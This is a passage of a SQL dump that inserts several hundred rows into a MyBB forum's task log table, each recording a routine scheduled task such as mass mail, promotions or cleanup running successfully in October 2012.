task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9996', '3', '1350171018', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9997', '9', '1350171628', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9998', '5', '1350172386', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9999', '9', '1350172549', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10000', '3', '1350172970', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10001', '1', '1350172982', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10002', '2', '1350172984', 'The daily cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10003', '7', '1350173007', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('10004', '11', '1350173016', 'The delayed moderation task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10005', '5', '1350173109', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10006', '9', '1350173823', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10007', '5', '1350174307', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10008', '9', '1350174343', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10009', '3', '1350174608', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10010', '9', '1350175312', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10011', '5', '1350175682', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10012', '9', '1350176132', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10013', '3', '1350176420', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10014', '1', '1350176438', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10015', '7', '1350176446', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('10016', '5', '1350176725', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10017', '9', '1350177207', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10018', '5', '1350178166', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10019', '9', '1350179030', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10020', '3', '1350179039', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10021', '5', '1350179209', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10022', '9', '1350180694', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10023', '3', '1350180705', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10024', '1', '1350180820', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10025', '7', '1350180823', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('10026', '5', '1350180825', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10027', '5', '1350181844', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10028', '9', '1350181848', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10029', '3', '1350181854', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10030', '9', '1350182940', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10031', '5', '1350183212', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10032', '9', '1350183328', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10033', '3', '1350183565', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10034', '1', '1350183613', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10035', '7', '1350183695', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('10036', '5', '1350183919', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10037', '9', '1350184252', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10038', '5', '1350185124', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10039', '9', '1350185166', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10040', '3', '1350185525', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10041', '9', '1350186526', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10042', '5', '1350186532', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10043', '9', '1350187401', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10044', '3', '1350187534', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10045', '1', '1350187770', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10046', '7', '1350187776', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('10047', '5', '1350187786', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10048', '9', '1350188810', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10049', '5', '1350188823', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10050', '3', '1350189013', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10051', '9', '1350190534', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10052', '5', '1350190560', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10053', '3', '1350191075', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10054', '1', '1350191093', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10055', '7', '1350191139', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('10056', '5', '1350191151', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10057', '9', '1350192918', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10058', '5', '1350192975', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10059', '3', '1350193608', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10060', '9', '1350193610', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10061', '5', '1350193630', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10062', '9', '1350194119', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10063', '3', '1350194533', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10064', '1', '1350194533', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10065', '7', '1350194548', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('10066', '5', '1350194864', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10067', '9', '1350195274', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10068', '5', '1350195944', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10069', '9', '1350195964', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10070', '3', '1350196423', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10071', '9', '1350196962', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10072', '5', '1350197325', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10073', '9', '1350197847', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10074', '3', '1350198459', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10075', '1', '1350198473', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10076', '7', '1350198714', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('10077', '5', '1350198719', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10078', '9', '1350198727', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10079', '5', '1350199515', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10080', '9', '1350199524', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10081', '3', '1350199820', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10082', '9', '1350200463', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10083', '5', '1350200716', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10084', '9', '1350201303', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10085', '3', '1350201549', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10086', '1', '1350201624', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10087', '7', '1350201656', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('10088', '5', '1350201921', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10089', '9', '1350202240', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10090', '5', '1350203173', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10091', '9', '1350203254', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10092', '3', '1350203417', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10093', '9', '1350204366', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10094', '5', '1350204376', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10095', '9', '1350205047', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10096', '3', '1350205390', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10097', '1', '1350205467', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10098', '7', '1350205491', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('10099', '5', '1350205599', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10100', '9', '1350205839', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10101', '5', '1350206755', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10102', '9', '1350206774', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10103', '3', '1350210970', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10104', '9', '1350211069', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10105', '5', '1350211088', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10106', '1', '1350211111', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10107', '7', '1350211770', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('10108', '9', '1350211856', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10109', '5', '1350212010', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10110', '9', '1350212120', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10111', '3', '1350214234', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10112', '1', '1350214239', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10113', '7', '1350214261', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('10114', '5', '1350214289', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10115', '9', '1350214297', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10116', '9', '1350216757', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10117', '5', '1350216766', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10118', '3', '1350216853', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10119', '1', '1350217175', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10120', '4', '1350217185', 'The database backup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10121', '7', '1350217207', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('10122', '5', '1350217517', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10123', '9', '1350218143', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10124', '3', '1350218148', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10125', '9', '1350218453', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10126', '5', '1350218786', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10127', '9', '1350219483', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10128', '3', '1350219555', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10129', '1', '1350219665', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10130', '7', '1350219671', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('10131', '5', '1350220283', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10132', '9', '1350220358', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10133', '5', '1350221129', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10134', '9', '1350221168', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10135', '3', '1350221429', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10136', '9', '1350222007', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10137', '5', '1350222602', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10138', '9', '1350223211', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10139', '3', '1350223219', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10140', '1', '1350223422', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10141', '7', '1350223435', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('10142', '5', '1350223588', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10143', '9', '1350224171', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10144', '5', '1350224701', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10145', '9', '1350224707', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10146', '3', '1350225022', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10147', '9', '1350226284', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10148', '5', '1350226295', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10149', '9', '1350226551', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10150', '3', '1350226776', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10151', '1', '1350226827', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10152', '7', '1350226835', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('10153', '5', '1350227159', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10154', '9', '1350227989', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10155', '5', '1350228361', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10156', '9', '1350228844', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10157', '3', '1350228860', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10158', '9', '1350229321', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10159', '5', '1350229864', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10160', '9', '1350230390', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10161', '3', '1350230393', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10162', '1', '1350230424', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10163', '7', '1350230430', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('10164', '5', '1350230719', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10165', '9', '1350231869', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10166', '5', '1350231916', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10167', '9', '1350231938', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10168', '3', '1350232235', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10169', '9', '1350232826', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10170', '5', '1350233280', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10171', '9', '1350234000', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10172', '3', '1350234003', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10173', '1', '1350234022', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10174', '7', '1350234026', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('10175', '5', '1350234828', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10176', '9', '1350235184', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10177', '5', '1350235605', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10178', '9', '1350236179', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10179', '3', '1350236185', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10180', '9', '1350236432', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10181', '5', '1350236726', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10182', '9', '1350237924', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10183', '3', '1350237927', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10184', '1', '1350237940', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10185', '7', '1350237948', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('10186', '5', '1350237949', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10187', '9', '1350238718', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10188', '5', '1350239660', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10189', '9', '1350239665', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10190', '3', '1350240272', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10191', '9', '1350240281', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10192', '5', '1350240416', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10193', '9', '1350241613', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10194', '3', '1350241971', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10195', '1', '1350242107', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10196', '7', '1350242111', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('10197', '5', '1350242328', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10198', '9', '1350242333', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10199', '5', '1350242774', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10200', '9', '1350243085', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10201', '3', '1350243109', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10202', '9', '1350243969', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10203', '5', '1350243982', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10204', '9', '1350244515', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10205', '3', '1350244830', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10206', '1', '1350244948', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10207', '7', '1350244958', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('10208', '5', '1350245130', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10209', '9', '1350245493', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10210', '5', '1350246302', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10211', '9', '1350246326', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10212', '3', '1350248191', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10213', '9', '1350248244', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10214', '5', '1350248366', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10215', '3', '1350248659', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10216', '1', '1350248957', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10217', '7', '1350248963', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('10218', '5', '1350248980', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10219', '9', '1350249327', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10220', '5', '1350249903', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10221', '9', '1350249914', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10222', '3', '1350250211', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10223', '9', '1350250894', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10224', '5', '1350251624', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10225', '9', '1350251998', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10226', '3', '1350252021', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10227', '1', '1350252079', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10228', '7', '1350252085', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('10229', '5', '1350252396', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10230', '9', '1350252615', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10231', '5', '1350253512', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10232', '9', '1350253516', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10233', '3', '1350253850', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10234', '9', '1350254424', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10235', '5', '1350254727', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10236', '9', '1350255914', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10237', '3', '1350255916', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10238', '1', '1350255918', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10239', '7', '1350255925', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('10240', '5', '1350255943', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10241', '9', '1350256244', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10242', '5', '1350257579', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10243', '9', '1350258064', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10244', '3', '1350258065', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10245', '5', '1350258704', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10246', '9', '1350259006', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10247', '3', '1350259170', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10248', '1', '1350259225', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10249', '2', '1350259228', 'The daily cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10250', '7', '1350259234', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('10251', '11', '1350259453', 'The delayed moderation task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10252', '5', '1350259527', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10253', '9', '1350259839', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10254', '5', '1350261318', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10255', '9', '1350261324', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10256', '3', '1350261331', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10257', '9', '1350261641', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10258', '5', '1350261997', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10259', '9', '1350262523', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10260', '3', '1350262838', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10261', '1', '1350262859', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10262', '7', '1350262863', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('10263', '5', '1350263267', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10264', '9', '1350263433', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10265', '5', '1350264323', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10266', '9', '1350264361', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10267', '3', '1350264690', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10268', '9', '1350265224', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10269', '5', '1350265806', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10270', '9', '1350266540', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10271', '3', '1350266556', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10272', '1', '1350266563', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10273', '7', '1350266567', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('10274', '5', '1350266806', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10275', '9', '1350267161', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10276', '5', '1350267904', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10277', '9', '1350268003', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10278', '3', '1350268208', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10279', '9', '1350268826', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10280', '5', '1350269218', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10281', '9', '1350269836', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10282', '3', '1350270039', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10283', '1', '1350270040', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10284', '7', '1350270097', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('10285', '5', '1350271138', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10286', '9', '1350271149', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10287', '5', '1350271599', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10288', '9', '1350271606', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10289', '3', '1350272012', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10290', '9', '1350272417', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10291', '5', '1350272730', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10292', '9', '1350273315', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10293', '3', '1350273565', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10294', '1', '1350273681', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10295', '7', '1350273907', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('10296', '5', '1350273912', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10297', '9', '1350274323', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10298', '5', '1350275163', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10299', '9', '1350275170', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10300', '3', '1350275600', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('10301', '9', '1350276018', 'The mass mail task successfully ran.'); 